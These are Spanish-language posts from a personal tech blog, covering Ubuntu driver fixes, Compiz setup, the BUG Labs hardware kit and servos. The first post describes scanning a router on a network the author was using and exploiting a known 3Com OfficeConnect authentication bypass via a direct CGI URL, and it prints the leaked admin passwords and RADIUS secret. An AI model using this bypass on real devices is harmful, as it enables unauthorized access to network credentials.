HiperGalaxia

Introducción.

El viernes pasado mientras aprendía acerca de Team Software Process se me ocurrió echar una mirada para intentar encontrar la dirección del filtro de contenido de la red que en la que estaba que la hacía prácticamente inútil bloqueando la mayoría de los sitios web de interés general.

Un traceroute de los sitios bloqueados no me mostró la ubicación que quería, sólo permitía llegar hasta el enrrutador inalámbrico que me estaba permitiendo acceder a la red LAN.  Decepcionado terminé saludándolo para darme cuenta de un problema de seguridad que ocultaba.

Conociendo al dispositivo.

Inicialmente no me dijo mucho, sólo que aparentemente era un dispositivo 3Com (o al menos su interfaz de red lo era).

$ sudo nmap -sA -O 192.168.2.1

Starting Nmap 5.00 ( http://nmap.org ) at 2010-01-16 08:10 COT
All 1000 scanned ports on 192.168.2.1 are unfiltered
MAC Address: 00:FF:C1:4D:FF:EE (3com Europe)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop

Posteriormente lo confirmé al ver que el dispositivo 3Com ejecutaba aparentemente una versión de Linux con el kernel 2.6 lo cual es relativamente reciente.

$ sudo nmap -sS -O 192.168.2.1

Starting Nmap 5.00 ( http://nmap.org ) at 2010-01-16 08:09 COT
Interesting ports on 192.168.2.1:
Not shown: 998 closed ports
PORT   STATE SERVICE
53/tcp open  domain
80/tcp open  http
MAC Address: 00:FF:C1:4D:FF:EE (3com Europe)
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.22
Network Distance: 1 hop

También se hizo evidente que el dispositivo permitía su administración a través de web (puerto 80).

Accediendo a el dispositivo utilizando un navegador web encontré que era finalmente un 3Com OfficeConnect Wireless 11g.  Sabiendo esto investigué un poco si había problemas conocidos con este dispositivo.

La vulnerabilidad.

Resulta que estos dispositivos manejan incorrectamente la autenticación/autorización de su módulo web de administración, protegiendo correctamente a las páginas pero permitiendo el acceso directo a los CGIs.  Esto unido a que el método de copia de seguridad de la configuración del router genera un archivo (config.bin) con esta información y lo almacena en su memoria interna para que el administrador lo descargue, termina convirtiéndose en un grave problema de seguridad.

El archivo puede descargarse mediante un CGI llamado SaveCfgFile así que para obtenerlo sólo es necesario acceder a él mediante un navegador web.

http://192.168.2.1/SaveCfgFile.cgi

El archivo contiene toda la configuración del enrrutador, incluyendo su información de red y contraseñas de administración!

…
httpd_username=admin
httpd_password=admin
…
mradius_username=admin
mradius_password=admin
mradius_secret=mradius1218
mradius_port=1812
…
http_username=admin
login_password=admin
http_passwd=admin
…

Conclusiones.

Esta vulnerabilidad fue reportada a 3Com por Luca Carettoni de ikkisoft.com en diciembre de 2008 y fue conocida por el público en general en febrero del 2009.

Supongo que desde hace tanto tiempo para acá 3Com ya ha solucionado esta vulnerabilidad y se encuentra disponible una actualización del firmware que la soluciona.

Debe tenerse especial cuidado en los dispositivos que tengan la opción de Remote Administration activa ya que esta vulnerabilidad podrá ser explotada desde Internet.

Enlaces.

• 3Com OfficeConnect Wireless Cable/DSL Router Authentication Bypass.
  http://packetstormsecurity.org/0902-exploits/LC-2008-05.txt
• 3Com® OfficeConnect® Wireless 11g Cable/DSL Gateway.
  http://www.3com.com/products/en_US/detail.jsp?tab=features&sku=3CRWE554G72&pathtype=support

Introducción.

Según sufrí constaté este fin de semana, hay un cierto tipo de conflicto entre las tarjetas WiFi Broadcom (como las incluídas por algunos equipos Dell Inspiron) y Linux Ubuntu 9.10.  En realidad el problema lo tuve mientras probaba el actual Ubuntu Moblin Remix el cual a su vez, es hijo de Ubuntu 9.10.

Problema.

Al iniciar el Ubuntu Moblin Remix, tanto desde el LiveCD/USB como desde la instalación en el disco duro la información de la tarjeta WiFi aparece como “no encontrada”.

Este problema no lo tuve cuando instalé Ubuntu 9.10 directamente, sin embargo encontré en los foros que varias personas si habían tenido el problema con esta versión, posiblemente con versiones release candidate.

Solución.

Conecte el equipo a la red alámbrica para acceder a Internet.

Instale, si aún no cuenta con ellas, las fuentes del Kernel actual.

$ sudo aptitude install linux-headers-$(uname -r)

Instale, si aún no cuenta con él, el controlador Broadcom 802.11 Linux STA.

$ sudo aptitude install bcmwl-kernel-source

Reconfigure de ser necesario el controlador Broadcom 802.11 Linux STA.

$ sudo dpkg-reconfigure bcmwl-kernel-source

Verifique que se ha activado exitosamente el controlador de la tarjeta wireless en la sección de controladores propietarios.

System > Administration > Hardware Drivers.

Reinicie el equipo.

Introducción.

Mi portátil, un Dell Vostro 1400, tiene una tarjeta de video sencilla Intel 965.  La aceleración gráfica de este modelo es bastante limitada, sin embargo es mas que suficiente para mis requerimientos personales en este rubro.

Con la versión 8.10 de Ubuntu funcionaba decentemente sin embargo con la actualización a 9.04 el Compiz dejo de funcionar.  La explicación es amplia, aparentemente hicieron cambios profundos en los drivers de Intel y en el sistema de ventanas que parecen no estar del todo completos aún.

El día de hoy estuve experimentando un poco con el video e hice funcionar al Compiz con poco esfuerzo.

Procedimiento.

Como primera medida actualicé el kernel a la versión 2.6.30 la cual he escuchado colabora a la mejora de los problemas reportados con las tarjetas Intel.

Después desactivé el compositing manager de Gnome que interfería con el de Compiz de la siguiente manrera.

1. Presionar ALT+F2: abrir Run Application.
2. Ejecutar la aplicación gconf-editor.
3. Navegar por las ramas del árbol izquierdo: / > Apps > Metacity > General.
4. En el panel derecho desactivar la casilla correspondiente a la llave compositing_manager.
5. Seleccione File > Quit para terminar la configuración.

Finalmente activé el Compiz.

$ compiz --replace

O desde la interfaz gráfica realizando los siguientes pasos.

1. 1. System > Preferences > Appearance.
   2. Seleccionar la hoja de efectos visuales (Visual Effects).
   3. Activar la opción Normal.
   4. De ser exitosa la activación se deberá confirmar.
   5. Cerrar el diálogo de propiedades de apariencia.

Solución de problemas.

Para encontrar que estaba entorpeciendo el funcionamiento del Compiz en mi equipo encontré que el script compiz-check es un buen aliado.  Estos fueron los pasos que seguí para su instalación y ejecución.

$ wget http://blogage.de/files/9124/download -O compiz-check

$ chmod +x compiz-check

$ ./compiz-check

Enlaces.

• Compiz-Check.
  http://forlong.blogage.de/entries/pages/Compiz-Check
• Actualización del Kernel en Ubuntu 9.04.
  http://blog.jorgeivanmeza.com/2009/06/actualizacion-del-kernel-en-ubuntu-9-04/

Para comenzar a desarrollar en la plataforma de prototipado de hardware basada en modulos Bug de Buglabs, se puede instalar el kit de desarrollo Dragonfly basado en Eclipse que contiene todas las herramientas necesarias para desarrollar y probar aplicaciones para este dispositivo.

Requisitos :

• Tener instalado el JDK
  sudo apt-get install sun-java6-jdk

Pasos :

• Abrir una consola
• Crear directorio para instalar el SDK
  mkdir dragonfly
  cd dragonfly
• Ir a la pagina oficial del SDK de Buglabs.net
  http://www.buglabs.net/sdk
• Desargar la version mas reciente para Linux, (unos 156 MB)
  por ejemplo la 1.1.7.39
  wget http://www.buglabs.net/sdk/production/dragonfly-lin.zip
• Descomprimir el archivo
  unzip dragonfly-lin.zip
• Ejecutar el eclipse
  ./eclipse/eclipse
• Seleccionar el workspace sobre el cual se quiere trabajar

Enlaces :

• BugLabs
  http://www.buglabs.net

"BUG es un conjunto de modulos electronicos faciles de usar que pueden acomplarse para crear cualquier dispositivo que se pueda uno imaginar. Cada modulo tiene una funcionalidad especifica, por ejemplo : camara, teclado, pantalla, salida de video, entre otros. Uno decide que funcionalidad requiere y BUG se encarga del resto, permitiendo crear dispositivos facil y rapidamente. Con BUG y su ambiente integrado de programacion, cualquiera puede construir, programar y compartir aplicaciones y dispositivos innovadores".
(fragme to de la traduccion de la descripcion oficial de BUG)

A diferencia de muchas plataformas de desarrollo y de prototipeado de hardware, donde se debe comprar todo el modulo que vende la compañia para probar determinadas carateristicas o comprar modulos pequeños los cuales deben ser acompados a tarjetas por medio de soldaduras o cables, o incluso crear circuitos electronicos para la regulacion de voltaje o comunicacion, BUG es el LEGO del prototipeado, permitiendo crear diferenter dispsitivos partiendo de una base y adicionando aquellas funcionalidades que se requieren, sin necesidad de una soldadura o de intrincados planos o implementaciones de software.

El dispositivo a construir debe partir del BUGbase, el cual es mini computador con sistema operativo Linux, con 128 MB de RAM, WiFi, bateria recargable, USB, tarjeta de red y una pequeña pantalla de LCD con botones de control; posee 4 conectores que permiten acoplar otros componentes, conocidos como los BUGmodules que implementan cierta funcionalidad, la cual puede ser adicionada al modulo principal para aumentar sus caracteristicas basicas, permitiendo crear dispositivos con diferentes funcionalidades y combinarlas para crear dispositivos con funciones innovadoras.

BUG esta construido totalmente con software libre y su ambiente de desarrollo esta basado en Eclipse. Las aplicaciones y servicios son dinamicamente cargados, deacuerdo a los modulos acomplados en el dispositivo. El lenguaje de programacion de alto nivel es Java que aloja una arquietctura basada en servicios.

Es una buena alternativa para la creacion de dispositivos en la etapa de prototipeado de las aplicaciones, ya que permite de una forma facil y rapida crearlos y ponerlos a funcionar, sin recaer en problemas de conectividad, manejo de voltajes, electronica. Ademas de esto siendo una plataforma Linux, me imagino que proto veremos cosas hechas en C, Python que le sacaran mas jugo al aparatejo. Adicional a todo esto esta Java, mi inagotable fuente de satisfacciones una vez mas presente.

Enlaces :

• BUGLabs : Sitio oficial de la plataforma
  http://www.buglabs.net
• Fotos del aparatejo :
  http://www.flickr.com/photos/bug_labs
• Reportaje en Engadget :
  http://www.engadget.com/2007/11/01/bug-labs-bugbase-and-bugmodules-hands-on

Un servo es un motor que no gira completamente y que puede posicionarse en cualquier angulo que este dentro de su rango de funcionamiento, de este modo es posible controlar la posicion actual del servo y el mismo corrige su posicion si se ve afectada. Los servos son muy utilizados en robotica como por ejemplo en la construccion de las articulaciones, lo cual permite controlar el el movimiento del brazo con gran presicion.

Internamente el servo posee un motor el cual cuenta con una serie de engranajes para aumentar la fuerza con que actua sobre el elemento a mover, asi como tambien posee un circuito electronico encargado de posicionar el eje en determinado angulo (generalmente tienen una capacidad de giro entre 0 y 180 grados), ademas de corregir la posicion del mismo si se ve afectado por una fuerza externa. El servo posee un conector con tres terminales dos para el suministro de la energia (tierra,voltaje) y un terminal que permite modificar la posicion por medio de PWM o modificacion por ancho de pulso. Los servos generalmente vienen acompañados de los tornillos para fijarlos, como tambien una serie de conectores para el eje que permiten utilizar el servo para diferentes propositos.

El servo que se muestra en el video tiene las siguientes caracteristicas :

• Modelo : HexTronik HXT500
• Peso : 5 gramos
• Dimesiones : 22.9x11.4x22 mm
• Voltaje : 3v a 6v
• Velocidad : 1.10 segundos/60 a 4.8v
• Torque : 0,8 kg-cm
• http://www.hobbycity.com/hobbycity/store/uh_viewItem.asp?idProduct=663

Existen una gran variedad de servos para gran cantidad de aplicaciones, la diferencias principales estan en la precision, la duracion, el torque y la velocidad.